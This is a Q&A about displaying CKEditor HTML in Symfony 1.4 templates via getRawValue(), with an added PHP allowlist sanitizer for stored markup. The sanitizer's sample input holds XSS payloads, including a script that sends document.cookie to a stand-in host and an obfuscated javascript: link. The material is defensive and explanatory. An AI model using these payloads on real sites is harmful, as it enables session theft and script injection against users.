Show HTML tags in template - Symfony and CKEditor. How safe is it?
Problem description
I use Symfony 1.4 and Doctrine 1.2. I installed the plugin http://www.symfony-project.org/plugins/sfCkPlugin. If I add new data from the form, this works OK, but in the template it shows me, for example:
<p><b>bold</b> <i>test</i></p>
etc.
instead of
bold test
I must add something here: getDesc() ?>, but what?
In the MySQL database I have:
<p> <strong>bold</strong> <u>test</u></p>
Is this safe?
This is happening because of the output escaper in Symfony.
You can fix it by calling getRawValue() on the data:
$obj->getDesc()->getRawValue();
Bear in mind that if you do this, you need to ensure that the HTML/JavaScript/whatever else that has been entered is safe to output on the page. If it's coming from a backend, you are probably OK. But if it's coming from end users, you should ensure you make it safe (block XSS attacks, prevent HTML that breaks the layout, etc.). It's a big topic!
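The answer leaves "make it safe" as an exercise. The following is an added example, not code from the original post, from sfCkPlugin or from Symfony: an allowlist sanitizer that can be run on the stored CKEditor markup before the raw value is echoed in the template. The function names (sanitizeRichText, sanitizeChildren, filterAttributes, isSafeUrl), the allowlist of tags and attributes, and the hostile sample input are assumptions chosen for illustration; a real allowlist should match whatever CKEditor toolbar the site enables.

```php
<?php
// Added example (not from the original post or sfCkPlugin): allowlist
// sanitizer for CKEditor output. Names, allowlist and sample input are
// assumptions for illustration.

// Elements kept, with the attributes each may carry. Anything not listed
// is unwrapped: its text and allowed children survive, the tag does not.
function richTextAllowlist()
{
    return array(
        'p' => array(), 'br' => array(), 'strong' => array(), 'b' => array(),
        'em' => array(), 'i' => array(), 'u' => array(),
        'ul' => array(), 'ol' => array(), 'li' => array(),
        'a' => array('href', 'title'),
    );
}

function sanitizeRichText($html)
{
    $doc = new DOMDocument();
    // Parse leniently: the stored value is a fragment and hostile input may
    // be malformed on purpose. The XML PI tells libxml the input is UTF-8.
    libxml_use_internal_errors(true);
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>');
    libxml_clear_errors();

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    sanitizeChildren($body, richTextAllowlist());

    // Serialise only the body's children so the html/body wrapper libxml
    // added stays out of the page. saveHTML($node) needs PHP >= 5.3.6.
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function sanitizeChildren(DOMNode $parent, array $allowed)
{
    // Elements whose contents must go too, not just the tag.
    static $dropWithContents = array('script', 'style', 'iframe', 'object', 'embed', 'noscript');

    // Copy first: removing or moving nodes while iterating childNodes skips siblings.
    $children = array();
    foreach ($parent->childNodes as $child) {
        $children[] = $child;
    }
    foreach ($children as $child) {
        if ($child->nodeType === XML_TEXT_NODE) {
            continue; // text is entity-encoded again by saveHTML
        }
        if ($child->nodeType !== XML_ELEMENT_NODE) {
            $parent->removeChild($child); // comments, incl. IE conditional comments
            continue;
        }
        $tag = strtolower($child->nodeName);
        if (in_array($tag, $dropWithContents, true)) {
            $parent->removeChild($child);
            continue;
        }
        sanitizeChildren($child, $allowed); // clean descendants before deciding on $child
        if (!isset($allowed[$tag])) {
            while ($child->firstChild) { // unwrap: keep children, drop the tag
                $parent->insertBefore($child->firstChild, $child);
            }
            $parent->removeChild($child);
            continue;
        }
        filterAttributes($child, $allowed[$tag]);
    }
}

function filterAttributes(DOMElement $el, array $allowedAttrs)
{
    $names = array();
    foreach ($el->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    foreach ($names as $name) {
        $lname = strtolower($name);
        if (!in_array($lname, $allowedAttrs, true)) {
            $el->removeAttribute($name); // drops onmouseover=, style=, target=, ...
        } elseif ($lname === 'href' && !isSafeUrl($el->getAttribute($name))) {
            $el->removeAttribute($name);
        }
    }
}

function isSafeUrl($url)
{
    // Browsers ignore control characters and whitespace inside a scheme
    // ("java<TAB>script:"), so strip them before inspecting it.
    $probe = preg_replace('/[\x00-\x20]/', '', $url);
    if (!preg_match('/^([a-z][a-z0-9+.-]*):/i', $probe, $m)) {
        return true; // relative URL, no scheme to abuse
    }
    return in_array(strtolower($m[1]), array('http', 'https', 'mailto'), true);
}

// Constructed sample input (not from the post): what a hostile user could
// submit by editing the POST body instead of typing into CKEditor.
$untrusted = '<p onmouseover="alert(1)"><strong>bold</strong> <u>test</u></p>'
    . '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    . '<a href="jAva&#9;script:alert(document.domain)">click</a>'
    . '<a href="https://example.com/" target="_blank">ok</a>';
echo sanitizeRichText($untrusted);
```

On the sample input this keeps the paragraph with its bold and underlined text but without the onmouseover handler, removes the script element together with its body, strips the javascript: href (libxml decodes the &#9; entity to a tab, which isSafeUrl discards before matching the scheme) while leaving the link text, and keeps the https link minus its target attribute. In the template the call wraps whatever unescaped string is taken from the escaper, so the raw value is passed through sanitizeRichText() before it is echoed rather than echoed directly. Sanitising on output rather than only on save also covers rows that were written before the filter existed. For production, a maintained library such as HTML Purifier handles far more than this block does (CSS, nested encodings, browser quirks); the example shows the principle behind it.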